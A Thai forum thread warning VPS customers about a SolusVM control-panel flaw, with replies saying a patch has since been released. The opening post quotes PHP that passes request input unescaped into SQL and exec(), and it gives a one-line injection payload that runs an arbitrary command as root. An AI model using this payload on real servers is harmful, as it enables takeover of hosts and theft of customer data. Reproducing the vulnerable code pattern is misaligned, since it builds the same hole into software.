เตือนภัย : VPS and Dedicated ที่ใช้ SolusVM

[normalblue]

ข่าวนี้แพร่ไปทั่วกลุ่มผู้ใช้บริการ VPS ทั่วยุโรปและอเมริกาตั้งแต่ วันที่ 16 มิ.ย. ที่ผ่านมาแล้วครับ

แต่ผมไม่แน่ใจว่าในนี้ทราบข่าวกันยัง เพราะ Search หาไม่เจอ เหตุที่ต้องนำเรื่องนี้มาลงเพราะผู้ให้บริการ Host ที่อเมริกา
ที่ผมใช้บริการอยู่ ได้ตัดสินใจยกเลิกการใช้งาน SolusVM ชั่วคราว หลังจากที่ผมได้ส่งหนังสือทักท้วงเกี่ยวกับรูรั่ว
ตั้งแต่วันที่ 16 ที่ผ่านมา

ยกตัวอย่าง Code ในไฟล์ centralcallback.php

โค้ด เลือก ขยาย

<?php
if ($_POST['delete']) {
    $xc = $db -> query('SELECT * FROM centralbackup WHERE id = \'' . $_POST['deleteid'] . '\'', true);
    #[...]
    if ($xc[status] == 'failed') {
           exec('php /usr/local/solusvm/system/bus.php -- --comm=deletebackup --serverid=' . $xc['bserver'] . ' --nodeid=' . $vdata['nodeid'] . ' --vserverid=' . $vdata['vserverid'] . ' --filename=' . $xc['filename']);
    #[...]
    }
 }
?>

เห็นทีแรกก็ตาค้างเหมือนกัน นี่เป็น Module ที่คนทั่วโลกใช้อย่างแพร่หลาย แต่ส่งผ่าน Parameter จาก Request กันแบบตรงๆ ไม่ผ่าน PreparedStatement
แถมเรียก Execute กันดื้อๆ

เอากันง่ายๆ ส่งผ่านค่าผ่านตัวแปรต่างๆ เพื่อรัน Command ในฐานะ root

โค้ด เลือก ขยาย

delete=1&deleteid=-1' union select 0,0,0,0,0,'failed',';/usr/local/solusvm/core/solusvmc-node --ebtables ";command to run as root";',0#

ปัง เสร็จโจรา ข้อมูลลูกค้าทุกอย่าง  

Host ใครใช้ก็เปิด Ticket ดูนะครับ ว่าแก้กันไปหรือยัง ทางที่ดีบอกปิดไปเลย พวก Control Panel ที่สั่ง Install สั่ง Run ผ่านเว็บได้ เพราะผมคาดว่าถ้ามีจุดไหนเป็นแบบนี้ จุดอื่นก็คงจะเขียนลักษณะคล้ายๆ กัน ถ้าใครขยันลองไปไล่ Code ดูก็ได้ครับ  

ปล. บทความเพิ่มเติม จาก Localhost.re http://localhost.re/p/solusvm-11303-vulnerabilities
แก้ไข : เดือน

[kingofdollars]

เปิดช่องให้ SQL injection เต็มๆ

[mostzaa]

อันนี้ในวงการมีการแก้ไขแล้วครับ solusvm ส่งเข้าเมลลูกค้าทุกท่านแมแต่คนที่ซื้อผ่าน reseller โดยจะให้อัพversion และลบไฟล์ ตอนนี้บัคตัวนี้คนที่แก้ตามก็จะไม่รั่วแล้วเพราะทาง solusvm ออก patch แก้

[iLhay]

ออก patch มาแก้นานแว้วฮะ

[normalblue]

อันนี้ในวงการมีการแก้ไขแล้วครับ solusvm ส่งเข้าเมลลูกค้าทุกท่านแมแต่คนที่ซื้อผ่าน reseller โดยจะให้อัพversion และลบไฟล์ ตอนนี้บัคตัวนี้คนที่แก้ตามก็จะไม่รั่วแล้วเพราะทาง solusvm ออก patch แก้

ผู้ให้บริการผมก็ได้ทำการ Update Patch ไปตั้งแต่วันที่ SolusVM ร่อน Email แล้วครับ แต่รู้สึกว่ามีกลุ่มบางกลุ่มตรวจเจออีกจุดเมื่อวันก่อน
เขาจึงตัดสินใจยุติการใช้งาน Reinstall/Reset Root Password และอื่นๆ จาก SolusVM ชั่วคราว ไปทำผ่านทาง Ticket เพื่อทำ Manual แทน

รอติดตามกันต่อไป

[songwutk]

ได้รับ Email แจ้งเหมือนกันครับ

เขาระงับการ login ผ่านเว็บแล้ว

ssh ได้อย่างเดียว

[treehost]

โอ้วแม่เจ้า ๆๆ  โลกนี้อยู่ยากขึ้นทุกวัน

[iczykung]

ผมใช้  VMware EXSi  รอดไป   

[songwutk]

โอ้วแม่เจ้า ๆๆ  โลกนี้อยู่ยากขึ้นทุกวัน

ใครเป็นคนฉลาดก็จะต้องระลึกนึกไ­ว้ดีๆ

อย่าพูดว่าความฉลาด ฉลาด

แล้วมันก็จะดีเสมอไป

คนฉลาดมันก็จะทำบาปหรือทำชั่วได­้ลึกซึ้ง

กว่าคนโง่นะ ดูกันในข้อนี้บ้าง

ที่มา : youtube.com/watch?v=HzQZobV9jYQ